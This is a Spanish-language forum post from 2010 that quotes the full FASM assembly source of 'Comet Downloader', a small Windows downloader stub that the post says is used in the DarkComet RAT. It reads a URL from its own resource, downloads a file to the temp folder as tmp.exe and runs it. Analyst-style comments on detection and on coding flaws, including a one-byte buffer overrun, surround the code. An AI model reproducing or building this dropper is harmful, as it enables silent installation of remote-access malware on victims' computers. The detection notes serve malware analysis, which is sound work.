Mar Nov 16, 2010 7:59 pm
Linkgl escribió: Es un downloader con puras APIs que almacena los datos en un RES
- Código:
;-----------------------------------;
; Comet Downloader [FASM] -;
; Author : DarkCoderSc -;
; Mail : [Tienes que estar registrado y conectado para ver este vínculo] -;
;----------------------------------------------------------------------;
; Size = 2048 bytes (2 KB) -;
; Server Editor support included: it will read the resource %URL% from RT_RCDATA -;
; This sample will be used in DarkComet-RAT ! -;
;----------------------------------------------------------------------;
Format PE GUI 4.0
entry start
include 'c:\FASMW168\include\win32a.inc'
;Var data section rw-------------------------------------
; Read/write data used by the stub: two constant strings, scratch variables
; for the resource lookup, and the buffers that receive the URL and the
; output path. Everything here is referenced by the code under 'start'.
section '.data' data readable writeable
;Const Values--------------------
; Verb string passed to ShellExecute as the operation to perform.
CMD_OPEN db 'open',0
; Fixed file name appended to the temp directory path. Because it is a
; constant, the resulting path is a stable on-disk artifact to match on.
filep db 'tmp.exe',0
;Uninitialized values------------
; handle  = GetModuleHandle result (stored, not read again in this listing).
handle dd ?
; hRes    = FindResource result for the '%URL%' RT_RCDATA entry.
hRes dd ?
; hReturn = LoadResource result; later given to LockResource and FreeResource.
hReturn dd ?
; sRes    = SizeofResource result; used as the byte count of the copy into url.
sRes dd ?
; pRes    = LockResource result; used as the source pointer of that copy.
pRes dd ?
; Res and SzBuf are declared but not referenced by the code in this listing.
Res db ?
SzBuf dd ?
;Server Editor Values------------
; Name of the resource looked up with type RT_RCDATA. The download URL is not
; present in the code itself; it is read at run time from this resource, so an
; analyst recovers it from the RT_RCDATA resource named '%URL%' in the PE file.
; (The file header attributes this to a "Server Editor"; presumably that tool
; writes the resource -- not shown here.)
RC_STR0 db '%URL%',0
; 256-byte buffer: receives the GetTempPath output, then has 'tmp.exe'
; appended, and is then used as the path for DeleteFile, URLDownloadToFile
; and ShellExecute.
TmpDir rb 256d
;--------------
; url is the destination of the RtlMoveMemory copy of sRes bytes.
; NOTE(review): only one byte is reserved here, so the copy is not bounded by
; the declared size; any resource longer than one byte spills into 'path' and
; whatever follows it in the section.
url db ?
; path is declared but not referenced by the code in this listing.
path db ?
;Code section--------------------------------------------
; Straight-line stub with no branches: read a URL from the PE's own resources,
; build <temp dir>tmp.exe, fetch the URL to that path, launch the file, exit.
; No API return value is tested anywhere below (there is no cmp/test/jump), so
; a failed call simply feeds its result into the next call.
;
; Observable behaviour for detection: a small GUI-subsystem process that
; deletes and then rewrites 'tmp.exe' in the user's temp directory through
; urlmon, and immediately starts that file via ShellExecute with verb 'open'.
section '.code' code readable executable
;Entry point---------------------------------------------
start:
; Module handle of the running image; stored but the calls below pass NULL.
invoke GetModuleHandle,0
mov [handle],eax
;Server Settings n1---------------------------------
; Locate the RT_RCDATA resource named '%URL%' in the current module (NULL).
invoke FindResource,NULL,RC_STR0,RT_RCDATA
mov [hRes],eax
invoke LoadResource,NULL,[hRes]
mov [hReturn],eax
; Resource length in bytes; becomes the copy length below.
invoke SizeofResource,NULL,[hRes]
mov [sRes],eax
; Pointer to the resource bytes.
invoke LockResource,[hReturn]
mov [pRes],eax
; movememory is imported as RtlMoveMemory: copy sRes bytes from pRes to url.
; The length comes entirely from the resource; nothing limits it to the size
; declared for url, and no terminating zero is added by this code.
invoke movememory,url,[pRes],[sRes]
invoke FreeResource,[hReturn]
; Clears eax; the value is overwritten by the next call's return value.
xor eax, eax
;Finally call the download process------------------
; NOTE(review): GetTempPathA is documented as (nBufferLength, lpBuffer). Here
; the address of TmpDir is passed for both parameters, so the length argument
; is the buffer address rather than the buffer's 256-byte size.
invoke GetTempPath,TmpDir,TmpDir
;Create The Final Path------------------------------
; strcat is imported as lstrcat: TmpDir becomes <temp dir> + 'tmp.exe'.
invoke strcat,TmpDir,filep
;Now Download---------------------------------------
; Remove any existing file at the target path before writing it.
invoke DeleteFile,TmpDir
; Fetch the content at url into the file named by TmpDir.
invoke URLDownloadToFile,0,url,TmpDir,0,NULL
; Open the downloaded file with the 'open' verb, shown normally (SW_SHOW).
; This runs regardless of whether the download above succeeded.
invoke ShellExecute,0,CMD_OPEN,TmpDir,0,0,SW_SHOW
exit:
invoke ExitProcess,0
;Import data section-------------------------------------
; Import table of the PE. It is readable without running the file, so it is
; useful for static triage: URLDownloadToFileA and ShellExecuteA appear next
; to the resource APIs (FindResourceA, LoadResource, SizeofResource,
; LockResource) plus GetTempPathA and DeleteFileA.
; lstrcpy, ZeroMemory (RtlZeroMemory) and MessageBox (MessageBoxA) are
; imported but not invoked by the code section in this listing; USER32.DLL is
; listed only for MessageBox.
section '.idata' import data readable
;Dll names-------------------------------
library urlmon,'URLMON.DLL',\
Shell32,'SHELL32.DLL',\
Kernel32,'KERNEL32.DLL',\
User32,'USER32.DLL'
; Download primitive (ANSI variant).
import urlmon,\
URLDownloadToFile,'URLDownloadToFileA'
; Launch primitive (ANSI variant).
import Shell32,\
ShellExecute,'ShellExecuteA'
; Resource access, memory copy, path building and process exit. The local
; names movememory and strcat are aliases for RtlMoveMemory and lstrcat.
import Kernel32,\
GetModuleHandle,'GetModuleHandleA',\
FindResource,'FindResourceA',\
LoadResource,'LoadResource',\
SizeofResource,'SizeofResource',\
LockResource,'LockResource',\
lstrcpy,'lstrcpy',\
ExitProcess,'ExitProcess',\
movememory,'RtlMoveMemory',\
FreeResource,'FreeResource',\
ZeroMemory,'RtlZeroMemory',\
strcat,'lstrcat',\
GetTempPath,'GetTempPathA',\
DeleteFile,'DeleteFileA'
; Not referenced by the code in this listing.
import User32,\
MessageBox,'MessageBoxA'